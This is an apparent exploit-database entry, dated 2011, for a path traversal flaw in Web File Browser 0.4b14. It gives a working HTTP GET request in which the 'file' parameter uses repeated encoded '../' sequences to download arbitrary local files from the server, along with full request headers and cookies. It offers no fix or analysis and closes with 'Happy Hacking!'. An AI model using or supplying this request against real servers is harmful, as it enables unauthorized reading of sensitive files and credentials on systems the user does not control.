Exploit Title: [Web File Browser 0.4b14 File Download Vulnerability]
# Date: [2011/11/03]
# Author: [Sangyun YOO]
# Email: yoosy0302 at naver dot com
# Software Link: [ http://downloads.sourceforge.net/project/webfilebrowser/webfilebrowser/0.4b14/webfilebrowser-0.4b14.zip ]
# Version: [Web File Browser 0.4b14]
# Tested on: [Windows 7 Starter K]
---------------------------------------
Using Paros Tool Request Message to the modulation of the Request Line ==>
GET http://192.168.0.189/webFileBrowser.php?act=download&subdir=&sortby=name&file=..%2f..%2f..%2f..%2f..%2f[localfile] HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 192.168.0.189
Cookie: user=admin; loginkey=8d28703726be663cd5afb551bbb78be4; AJXP_LAST_KNOWN_VERSION=3.2.4; mx64B616EE8DEC99D3BFE053EAB04DC8=fcf2ad987a6db7670d4510ff9fa82a66; mx1B5F4F6EE7FC1C64773320E0BBE578=fe7c641b1a977587b5b6e0d355072a84; tab_usersconfig=0
===== Happy Hacking! =====